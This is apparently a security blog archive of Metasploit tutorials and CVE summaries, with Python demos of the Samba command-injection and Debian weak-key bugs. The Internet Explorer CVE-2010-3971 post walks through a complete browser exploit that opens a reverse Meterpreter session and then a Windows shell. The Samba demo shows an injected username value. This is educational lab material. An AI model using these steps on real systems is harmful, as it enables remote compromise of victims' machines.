Exploits and Security<center>The insecurity of the security.</center>José Antonio Pérez (Japtron), http://www.blogger.com/profile/03741433621974456398<br />
<br /><b>iPad 2 iOS 5.0.1 Metasploit</b> (2012-01-24)<br /><div style="text-align: center;"><iframe allowfullscreen="" frameborder="0" height="390" src="http://www.youtube.com/embed/lb5WRu3EjQI" title="YouTube video player" width="480"></iframe></div>
<br /><b>Metasploit + Nessus + XSSF - Episode 2 - Linking Metasploit and Nessus</b> (2011-02-10)<br /><div style="text-align: center;"><iframe allowfullscreen="" frameborder="0" height="390" src="http://www.youtube.com/embed/1HHGuJJidug" title="YouTube video player" width="480"></iframe></div>
<br /><b>Metasploit + Nessus + XSSF - Episode 1 - Installation</b> (2011-02-10)<br /><div style="text-align: center;"><iframe allowfullscreen="" frameborder="0" height="390" src="http://www.youtube.com/embed/HAhbPs9ArbY" title="YouTube video player" width="480"></iframe></div>
<br /><b>Metasploitable Guide - Episode 3 - Samba Server - Root Access</b> (2011-01-26)<br /><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">Exploiting the Samba server to obtain root access.</span></div><div style="font-family: inherit; text-align: left;"><br /><span style="font-size: small;">CVE 2007-2447</span><br /><span style="font-size: small;">The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.</span><br /><br /><span style="font-size: small;">Path (1) is the one that matters for an unauthenticated attacker: the username map script is run while the logon is still being processed, with the client-supplied username spliced into a shell command line, so no valid credentials are needed. Paths (2) and (3) require an authenticated user.</span></div><div style="text-align: center;"><br /><iframe allowfullscreen="" class="youtube-player" frameborder="0" height="390" src="http://www.youtube.com/embed/1Y37FMR03pY?hd=1" title="YouTube video player" type="text/html" width="480"></iframe></div>
<br /><b>Metasploitable Guide - Episode 2 - PostgreSQL + SSH</b> (2011-01-22)<br /><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">This video shows an attack on PostgreSQL followed by an intrusion via SSH.</span><br /><br /><span style="font-family: inherit; font-size: small;">CVE 2008-0166</span><br /><span style="font-family: inherit; font-size: small;">OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.</span></div><div style="text-align: center;"><div style="text-align: justify;"><br /></div><iframe allowfullscreen="" 
class="youtube-player" frameborder="0" height="390" src="http://www.youtube.com/embed/uKchtcwZOnc" title="YouTube video player" type="text/html" width="480"></iframe></div>
<br /><b>Metasploitable Guide - Episode 1 - distccd + privilege escalation</b> (2011-01-20)<br /><div style="font-family: inherit; text-align: justify;"><div style="font-family: inherit;"><span style="font-size: small;">This is the first episode of a series of Metasploitable guides. More episodes will be uploaded soon. The distcc bug gives an unprivileged remote shell; the udev bug is the local privilege escalation used afterwards.</span></div><div style="font-family: inherit;"><span style="font-size: small;"><br />CVE 2004-2687<br />distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks. (distccd's --allow option is the access restriction referred to here; without it any client that can reach the port may submit jobs.)<br /></span></div><span style="font-size: small;"><span style="font-family: inherit;">CVE 2009-1185</span><br style="font-family: inherit;" /><span style="font-family: inherit;">udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.</span></span></div><br /><div style="text-align: center;"><object height="385" width="480"><param name="movie" value="http://www.youtube.com/v/ANJiPanbYFo?fs=1&hl=es_ES"> </param><param name="allowFullScreen" value="true"> </param><param name="allowscriptaccess" value="always"> </param><embed src="http://www.youtube.com/v/ANJiPanbYFo?fs=1&hl=es_ES" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed></object></div>
<br /><b>Exploiting CVE 2010-3971 in Windows 7 - VNC Controller</b> (2011-01-17)<br /><div 
style="text-align: justify;"><span style="font-family: inherit; font-size: small;">Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 7 and 8 and possibly other products, allows remote attackers to cause a denial of service (crash) and execute arbitrary code via multiple @import calls in a crafted document.</span></div><br /><div style="text-align: center;"><object height="385" width="480"><param name="movie" value="http://www.youtube.com/v/t3i5CcUTPuE?fs=1&hl=es_ES"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/t3i5CcUTPuE?fs=1&hl=es_ES" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed></object></div>
<br /><b>Bypassing Windows 7 with SET and Metasploit - Privilege escalation</b> (2011-01-01)<br /><div style="text-align: justify;"><span style="font-family: inherit;">This method abuses process injection into a process that carries a trusted Windows publisher certificate (for example explorer.exe, which runs at medium integrity). It works on both x86 and x64 platforms.</span></div><br /><div style="text-align: center;"><object height="385" width="480"><param name="movie" value="http://www.youtube.com/v/F36Qgn_cAVo?fs=1&hl=es_ES"> </param><param name="allowFullScreen" value="true"> </param><param name="allowscriptaccess" value="always"> </param><embed src="http://www.youtube.com/v/F36Qgn_cAVo?fs=1&hl=es_ES" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed></object></div>
<br /><b>Exploiting Windows 7 - Internet Explorer 0day CVE 2010-3971 with Metasploit from an iPhone 4</b> (2010-12-26)<br /><div style="font-family: inherit;">Exploitable over 3G or Wi-Fi.</div><div style="font-family: inherit;">Also valid for Metasploit on Windows, Linux and Mac OS X.</div><div style="font-family: inherit;"><br /></div><div style="font-family: inherit; text-align: justify;">Description of the vulnerability:</div><div style="font-family: inherit; text-align: justify;"><br /><span style="font-size: small;">CVE 2010-3971</span></div><div style="font-family: inherit; text-align: justify;">Use-after-free vulnerability in the CSharedStyleSheet::Notify function in the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 7 and 8 and possibly other products, allows remote attackers to cause a denial of service (crash) and execute arbitrary code via multiple @import calls in a crafted document.</div><div style="font-family: inherit; 
text-align: justify;">There are several public exploits, but I will use Metasploit for our example.</div><div style="font-family: inherit; text-align: justify;">Metasploit module used: ms11_xxx_ie_css_import. (That was the module's name before Microsoft assigned bulletin MS11-003 to this bug; later Metasploit releases ship it as exploit/windows/browser/ms11_003_ie_css_import.)</div><br /><pre style="background-color: black; color: white;"><code>msf > use exploit/windows/browser/ms11_xxx_ie_css_import<br />msf exploit (<span style="color: red;">ms11_xxx_ie_css_import</span>) > set PAYLOAD windows/meterpreter/reverse_tcp<br />PAYLOAD => windows/meterpreter/reverse_tcp<br />msf exploit (<span style="color: red;">ms11_xxx_ie_css_import</span>) > set SRVHOST 172.16.0.101<br />SRVHOST => 172.16.0.101<br />msf exploit (<span style="color: red;">ms11_xxx_ie_css_import</span>) > set LHOST 172.16.0.101<br />LHOST => 172.16.0.101<br />msf exploit (<span style="color: red;">ms11_xxx_ie_css_import</span>) > exploit<br /><span style="color: blue;">[*]</span> Exploit running as background job.<br /><span style="color: blue;">[*]</span> Started reverse handler on 172.16.0.101:4444<br /><span style="color: blue;">[*]</span> Using URL: http://172.16.0.101:8080/gbWbMzi4<br /><span style="color: blue;">[*]</span> Server started.</code></pre><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_ZvVpir3GeAQ/TSH_uLeMSHI/AAAAAAAAAF0/gcn6ECfyrnA/s400/0.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/_ZvVpir3GeAQ/TSH_uLeMSHI/AAAAAAAAAF0/gcn6ECfyrnA/s320/0.PNG" width="213" /></a><a href="http://4.bp.blogspot.com/_ZvVpir3GeAQ/TSH_uUbRgGI/AAAAAAAAAF4/23S3tgCITaM/s400/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/_ZvVpir3GeAQ/TSH_uUbRgGI/AAAAAAAAAF4/23S3tgCITaM/s320/1.PNG" width="213" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_ZvVpir3GeAQ/TSH_ulKtNgI/AAAAAAAAAF8/faU8bbPVrT8/s400/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/_ZvVpir3GeAQ/TSH_ulKtNgI/AAAAAAAAAF8/faU8bbPVrT8/s320/2.PNG" width="213" /></a><a href="http://4.bp.blogspot.com/_ZvVpir3GeAQ/TSH_unlJLvI/AAAAAAAAAGA/pcpICa06OfM/s400/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/_ZvVpir3GeAQ/TSH_unlJLvI/AAAAAAAAAGA/pcpICa06OfM/s320/3.PNG" width="213" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_ZvVpir3GeAQ/TSH_ujEkAeI/AAAAAAAAAGE/3ssVmaMLvJA/s400/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://1.bp.blogspot.com/_ZvVpir3GeAQ/TSH_ujEkAeI/AAAAAAAAAGE/3ssVmaMLvJA/s320/4.PNG" width="213" /></a><a href="http://4.bp.blogspot.com/_ZvVpir3GeAQ/TSH_0uXawPI/AAAAAAAAAGI/ke04QakLPV8/s400/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/_ZvVpir3GeAQ/TSH_0uXawPI/AAAAAAAAAGI/ke04QakLPV8/s320/5.PNG" width="213" /></a></div><br /><b><u>Description</u></b><br /><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">- Select the exploit to use:</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">use exploit/windows/browser/ms11_xxx_ie_css_import</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">- Set the payload:</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">set PAYLOAD windows/meterpreter/reverse_tcp</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">- Set the address the exploit's web server listens on (in this case our iPhone):</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">set SRVHOST 172.16.0.101</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">- Set the IP address the victim will connect back to (again our iPhone):</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">set LHOST 172.16.0.101</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">- Run the exploit:</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">exploit</span></div><div style="font-family: inherit;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit;"><span style="font-size: small;">Metasploit generates a malicious URL (the "Using URL" line in the output above):</span></div><div style="font-family: inherit;"><span style="font-size: small;"><br /></span></div><pre style="font-family: inherit;"><span style="font-size: small;"><code>http://172.16.0.101:8080/gbWbMzi4</code></span></pre><div style="font-family: inherit;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">The victim must open that URL in Internet Explorer. There are several ways to achieve that, but I will not go into details here.</span></div><div style="font-family: inherit;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">When the victim opens the URL, something like the following appears:</span></div><pre style="background-color: black; color: white;"><code>msf exploit(ms11_xxx_ie_css_import) > <span style="color: blue;">[*]</span> 172.16.0.101:53759 Received request for "/gbWbMzi4"<br /><span style="color: blue;">[*]</span> 172.16.0.101:53759 Sending windows/browser/ms11_xxx_ie_css_import redirect<br /><span style="color: blue;">[*]</span> 172.16.0.101:53759 Received request for "/gbWbMzi4/sa1Ck.html"<br /><span style="color: blue;">[*]</span> 172.16.0.101:53759 Sending windows/browser/ms11_xxx_ie_css_import HTML<br /><span style="color: blue;">[*]</span> 172.16.0.101:53759 Received request for "/gbWbMzi4/generic-1294064502.dll"<br /><span style="color: blue;">[*]</span> 172.16.0.101:53759 Sending windows/browser/ms11_xxx_ie_css_import .NET DLL<br /><span style="color: blue;">[*]</span> 172.16.0.101:53761 Received request for "/gbWbMzi4/\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A"<br /><span style="color: blue;">[*]</span> 172.16.0.101:53761 Sending windows/browser/ms11_xxx_ie_css_import CSS<br /><span style="color: blue;">[*]</span> Sending stage (749056 bytes) to 172.16.0.101<br /><span style="color: blue;">[*]</span> Meterpreter session 1 opened (172.16.0.101:4444 -> 172.16.0.101:53762) at 2011-01-03 15:21:47 +0100<br /><span style="color: blue;">[*]</span> Session ID 1 (172.16.0.101:4444 -> 172.16.0.101:53762) processing InitialAutoRunScript 'migrate -f'<br /><span style="color: blue;">[*]</span> Current server process: iexplore.exe (2320)<br /><span style="color: blue;">[*]</span> Spawning a notepad.exe host process...<br /><span style="color: blue;">[*]</span> Migrating into process ID 2492<br /><span style="color: blue;">[*]</span> New server process: notepad.exe (2492)</code></pre><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">The last five lines are the module's InitialAutoRunScript ('migrate -f') moving the Meterpreter out of iexplore.exe into a freshly spawned notepad.exe, so the session survives when the corrupted browser process exits.</span></div><br />Connect to the session:<br /><pre style="background-color: black; color: white;"><code>msf exploit (<span style="color: red;">ms11_xxx_ie_css_import</span>) > sessions -i 1</code></pre><br />Get a shell on the system:<br /><pre style="background-color: black; color: white;"><code>meterpreter > execute -f cmd.exe -H -i<br />Process 2544 created.<br />Channel 1 created.<br />Microsoft Windows [Version 6.1.7600]<br />Copyright (c) 2009 Microsoft Corporation. All rights reserved.<br /><br />C:\Users\Tester\Desktop></code></pre>
<br /><b>Installing Metasploit 3.5.1+ and SET on an iPhone 4</b> (2010-12-25)<br /><div style="font: 12px Arial; margin: 0px;">Via SSH.</div><div style="font: 12px Arial; margin: 0px;"><br /></div><div style="font: 12px Arial; margin: 0px;">#MSF3<br /><br /></div><div style="font: 13px Arial; margin: 0px;">apt-get install subversion nano wget python</div><div style="font: 12px Arial; margin: 0px;">cd /private/var/</div><div style="font: 12px Arial; margin: 0px;">wget http://apt.saurik.com/cydia/debs/ruby_1.8.6-p111-5_iphoneos-arm.deb</div><div style="font: 12px Arial; margin: 0px;">dpkg -i ruby_1.8.6-p111-5_iphoneos-arm.deb</div><div style="font: 13px Arial; margin: 0px;">apt-get install rubygems</div><div style="font: 13px Arial; margin: 0px;">wget http://updates.metasploit.com/data/releases/framework-3.5.1.tar.bz2</div><div style="font: 13px Arial; margin: 0px;">tar jxpf framework-3.5.1.tar.bz2</div><div style="font: 13px Arial; margin: 0px;">cd msf3</div><div style="font: 13px Arial; margin: 0px;">./msfconsole<br /><br /></div><div style="font: 13px Arial; margin: 0px;"><br />#SET</div><div style="font: 13px Arial; margin: 0px;"><br /></div><div style="font: 13px Arial; margin: 0px;">cd /private/var/</div><div style="font: 13px Arial; margin: 0px;">svn co 
http://svn.thepentest.com/social_engineering_toolkit/ SET/</div><div style="font: 13px Arial; margin: 0px;">cd SET</div><div style="font: 13px Arial; margin: 0px;">./set # Accept the installation of whatever Python modules it asks for.<br /><br /></div><div style="font: 13px Arial; margin: 0px;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_ZvVpir3GeAQ/TRXu6iCFKOI/AAAAAAAAAE4/ojxGx8XPBoo/s400/la%20foto-2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/_ZvVpir3GeAQ/TRXu6iCFKOI/AAAAAAAAAE4/ojxGx8XPBoo/s320/la%20foto-2.PNG" width="213" /></a><a href="http://4.bp.blogspot.com/_ZvVpir3GeAQ/TRXu6ugnByI/AAAAAAAAAFY/ODJb6YRXPXQ/s400/la%20foto-1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/_ZvVpir3GeAQ/TRXu6ugnByI/AAAAAAAAAFY/ODJb6YRXPXQ/s320/la%20foto-1.PNG" width="213" /></a></div><div style="font: 13px Arial; margin: 0px;"><br /></div><div style="font: 13px Arial; margin: 0px;">Note: do not upgrade ruby, since it will break the installation.</div><div style="font: 13px Arial; margin: 0px;">Note also that the ruby package and the framework tarball are fetched over plain HTTP with no signature or checksum verification in the steps above; check what you downloaded before running it on a device you care about.</div><div><br /></div>
<br /><b>Social-Engineer Toolkit (SET) v1.1 Released</b> (2010-12-25)<br /><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;"><a href="http://security-sh3ll.blogspot.com/2010/12/social-engineer-toolkit-set-v11.html">Social-Engineer Toolkit (SET) v1.1 Released</a></span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">SET v1.1 Codename: “Happy Holidays” Released</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">This release adds new Metasploit-based client-side attacks (4 in total), many optimizations on the SET web server including proper threading to make it run faster as well as an overall of optimizations through the entire code base. The next version 1.2 will be an overhaul of function calls and centralization of modules to allow easier additions for third party contributions.</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">Also added in this release is a new set_config option that will automatically disable the auto redirection on the Java Applet so in examples with Multi-Attack where you use Java Applet + Credential Harvester it will now only redirect once the credential harvester is executed. This is especially useful when you get your payload execution and harvest credentials all within one attack.</span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;"><br /></span></div><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">Lastly, another great option is I've added UPX support for the Java Applet and Payload Generator attacks. In the set_config is a new option called "UPX_ENCODE=ON", this is on by default and checks to see if UPX is in the default Back|Track path. If it's not it will automatically disable the UPX packing, otherwise it will automatically pack the executable with the UPX packer. You can turn this off in the set_config by specifying UPX_ENCODE=OFF. 
Enjoy the latest version of SET, there is more to come with the next 1.2 release which is currently under development.</span></div>
<br /><b>ProFTPD with mod_sql pre-authentication, remote root</b> (2010-12-24)<br /><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">This paper describes and explores a pre-authentication remote root heap overflow in the ProFTPD [1] FTP server. It's not quite a standard overflow, due to how the ProFTPD heap works, and how the bug is exploited via variable substitution. The vulnerability was inadvertently mitigated (from remote root, at least :( ) when the ProFTPD developers fixed a separate vulnerability in mod_sql where you could inject SQL and bypass authentication. That vulnerability that mitigated it is documented in CVE-2009-0542. The specific vulnerability we are exploring is an unbounded copy operation in sql_prepare_where(), which has not been fixed yet. Also, I'd like to preemptively apologise for the attached code. 
It evolved over time in piecemeal fashion, and isn't overly pretty/readable by now.</span></div><span style="font-family: inherit; font-size: small;"><br />Full document and exploit <a href="http://www.megaupload.com/?d=OGC5SP63">here</a>.</span>
<br /><b>Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC</b> (2010-12-21)<br /><div style="font-family: inherit;"><span class="Apple-style-span" style="font-size: small;">The vulnerability lets an unauthenticated remote client cause a denial of service in the IIS 7.5 FTP service. Proof-of-concept exploit </span><span style="font-size: small;"><a href="http://www.exploit-db.com/exploits/15803/"><span class="Apple-style-span">here</span></a></span><span class="Apple-style-span" style="font-size: small;">.</span></div>
<br /><b>Metasploit Framework 3.5.1 Released</b> (2010-12-15)<br /><div style="font-family: inherit; text-align: justify;"><span style="font-size: small;">Versions 3.5.1 of the Metasploit Framework, Metasploit Express, and Metasploit Pro have gone live! This synchronized release adds 47 new modules and 8 new scripts since 3.5.0, bringing the total to 635 exploits, 314 auxiliary modules, and 215 payloads. Metasploit now provides additional exploits for SAP BusinessObjects, Exim mail servers, ProFTPD file transfer installations, SCADA deployments (BACnet, Citect, DATAC), Novell NetWare servers, Microsoft Internet Explorer, and browser plugins such as Adobe Flash and Oracle Java. Improvements have been made to the client-side Java exploits. The Meterpreter payload now supports webcam, microphone, and screen spying. Brute force modules support empty user names and now include the Unix "r" services, VNC, and SNMP protocols. The Nessus import plugin has been updated, basic support for nCircle has been added, and the framework can now export into the PWDump and John the Ripper formats.</span></div>
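<div style="font-family: inherit; text-align: justify;">Added example for the Samba episode above (Metasploitable Guide - Episode 3). This is not code from the original post or from Samba; it models the bug class behind CVE 2007-2447 in Python. A stand-in "username map script" (plain <code>echo</code>, an assumption for the demo, so the output shows exactly what the shell did with the username) is invoked with the client-supplied username pasted into a shell command line, so metacharacters in the username run as extra commands. The hardened variants pass the username as a single argv element, or quote it with <code>shlex.quote</code> when a shell cannot be avoided, and <code>map_username</code> additionally rejects names outside a conservative allow-list (the pattern is my choice, not Samba's). The attacker input is constructed for the demo.</div>

```python
import re
import shlex
import subprocess

# Stand-in for the smb.conf "username map script" (assumption for the demo: plain echo,
# so the returned text shows exactly what the shell did with the username).
MAP_SCRIPT = "echo"

# Conservative allow-list for usernames handed to an external program (my choice for the demo).
# Anything else (';', '`', '$(', quotes, whitespace, ...) is refused before it reaches a shell.
SAFE_USERNAME = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")


def is_safe_username(username: str) -> bool:
    return SAFE_USERNAME.fullmatch(username) is not None


def run_map_script_vulnerable(username: str, script: str = MAP_SCRIPT) -> str:
    """The CVE 2007-2447 pattern: the username is concatenated into a command string
    that is handed to /bin/sh, so 'alice; id' also runs 'id' as the smbd user."""
    command = f"{script} {username}"
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout


def run_map_script_argv(username: str, script: str = MAP_SCRIPT) -> str:
    """Hardened: no shell at all. The username is one argv element and is never
    parsed for metacharacters, whatever it contains."""
    result = subprocess.run([script, username], shell=False, capture_output=True, text=True)
    return result.stdout


def run_map_script_quoted(username: str, script: str = MAP_SCRIPT) -> str:
    """Hardened for the case where a shell is unavoidable (pipelines, redirection):
    shlex.quote() turns the username into a single-quoted literal."""
    command = f"{script} {shlex.quote(username)}"
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout


def map_username(username: str) -> str:
    """What a fixed server should do: validate first, then call without a shell."""
    if not is_safe_username(username):
        raise ValueError(f"refusing to map suspicious username: {username!r}")
    return run_map_script_argv(username)


if __name__ == "__main__":
    # Constructed attacker input in the style of the public PoCs: a shell metacharacter
    # followed by a command of the attacker's choice (a harmless echo here).
    evil = "alice; echo INJECTED"
    print("vulnerable:", repr(run_map_script_vulnerable(evil)))  # the second command ran
    print("argv      :", repr(run_map_script_argv(evil)))        # one literal argument
    print("quoted    :", repr(run_map_script_quoted(evil)))      # one literal argument
    try:
        map_username(evil)
    except ValueError as err:
        print("validated :", err)
```

The argv form is the one to prefer: it removes the shell from the path entirely, whereas quoting only helps as long as every call site remembers to quote. The allow-list is defence in depth for the case where the script itself re-parses its argument.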
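<div style="font-family: inherit; text-align: justify;">Added example for the PostgreSQL + SSH episode above (Metasploitable Guide - Episode 2); it is not code from the original post or from OpenSSL. CVE 2008-0166 turned key generation into a guessing game because the patched Debian generator was effectively seeded by the process ID alone, so on a given architecture at most 32,768 distinct keys existed for a key type and size. The toy key derivation below (SHA-256 based, an assumption for the demo, nothing like real RSA) reproduces that shape: the "attacker" recovers the private key from the public key by enumerating every seed, and the "defender" builds the equivalent of Debian's openssl-blacklist fingerprint list to detect weak keys before trusting them.</div>

```python
import hashlib
import os

# Seed space left to the broken Debian generator: the process ID, at most 32768 values
# on Linux of the time. Every key made on such a system came from one of these seeds.
PID_MAX = 32768


def toy_private_key(seed: int) -> bytes:
    """Stand-in for PRNG-driven key generation: the key is a pure function of the seed
    (assumption for the demo; a real RSA keygen draws many more bytes, but just as
    deterministically from the same starved PRNG)."""
    return hashlib.sha256(b"toy-keygen|" + seed.to_bytes(4, "big")).digest()


def toy_public_key(private_key: bytes) -> bytes:
    """One-way map from private to public key, standing in for computing the RSA modulus."""
    return hashlib.sha256(b"toy-public|" + private_key).digest()


def generate_weak_keypair(pid: int):
    """What a vulnerable Debian host did: the only entropy is the generating process's PID."""
    private_key = toy_private_key(pid)
    return private_key, toy_public_key(private_key)


def generate_strong_keypair():
    """A properly seeded generator: 256 bits of OS randomness, so enumeration is hopeless."""
    private_key = hashlib.sha256(b"toy-keygen|" + os.urandom(32)).digest()
    return private_key, toy_public_key(private_key)


def recover_private_key(public_key: bytes, seed_space: int = PID_MAX):
    """Attacker side of the CVE text: a brute-force guessing attack over every possible seed.
    Returns (seed, private_key) on success, None if the key did not come from the weak space."""
    for seed in range(seed_space):
        candidate = toy_private_key(seed)
        if toy_public_key(candidate) == public_key:
            return seed, candidate
    return None


def build_weak_key_blacklist(seed_space: int = PID_MAX):
    """Defender side: precompute every weak public key once, as the openssl-blacklist package
    did for real keys, then check incoming keys (authorized_keys, certificates) against it."""
    return {toy_public_key(toy_private_key(seed)) for seed in range(seed_space)}


def is_weak_key(public_key: bytes, blacklist) -> bool:
    return public_key in blacklist


if __name__ == "__main__":
    weak_priv, weak_pub = generate_weak_keypair(pid=4242)
    print("private key recovered from public key:", recover_private_key(weak_pub) == (4242, weak_priv))
    blacklist = build_weak_key_blacklist()
    print("weak key flagged by blacklist:", is_weak_key(weak_pub, blacklist))
    print("strong key flagged by blacklist:", is_weak_key(generate_strong_keypair()[1], blacklist))
```

The point of the blacklist half is operational: after the advisory, hosts had to refuse weak keys already deployed in authorized_keys files and certificates, not just generate new ones, and a precomputed fingerprint set is the cheap way to do that check at every trust decision.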